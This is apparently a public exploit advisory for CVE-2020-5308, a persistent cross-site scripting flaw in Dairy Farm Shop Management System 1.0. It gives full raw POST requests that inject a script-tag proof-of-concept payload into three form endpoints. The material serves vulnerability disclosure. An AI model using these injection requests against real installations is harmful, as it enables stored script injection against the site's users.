Dairy Farm Shop Management System 1.0 Cross Site Scripting

🗓️ 07 Jan 2020 00:00:00Reported by Chris InzingaType

packetstorm🔗 packetstormsecurity.com👁 160 Views

Dairy Farm Shop Management System 1.0 Persistent Cross-Site Scriptin

Reporter	Title	Published	Views	Family All 10
ATTACKERKB	CVE-2020-5308	7 Jan 202000:00	–	attackerkb
CNVD	Dairy Farm Shop Management System Cross-Site Scripting Vulnerability	8 Jan 202000:00	–	cnvd
CVE	CVE-2020-5308	9 Jan 202012:15	–	cve
Cvelist	CVE-2020-5308	9 Jan 202012:15	–	cvelist
EUVD	EUVD-2020-26494	7 Oct 202500:30	–	euvd
NVD	CVE-2020-5308	9 Jan 202013:15	–	nvd
OSV	CVE-2020-5308	9 Jan 202013:15	–	osv
Prion	Design/Logic Flaw	9 Jan 202013:15	–	prion
Positive Technologies	PT-2020-18397 · Phpgurukul · Phpgurukul Dairy Farm Shop Management System	9 Jan 202000:00	–	ptsecurity
RedhatCVE	CVE-2020-5308	22 May 202517:42	–	redhatcve

`# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: CVE-2020-5308  
  
================ 1. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-category.php  
Method: POST  
Parameter(s): 'category' & 'categorycode'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 2. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-company.php  
Method: POST  
Parameter(s): 'companyname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-company.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-company.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 59  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 3. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-product.php  
Method: POST  
Parameter(s): 'productname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-product.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-product.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=  
  
  
  
`

07 Jan 2020 00:00Current

6.7Medium risk

Vulners AI Score6.7

EPSS0.00361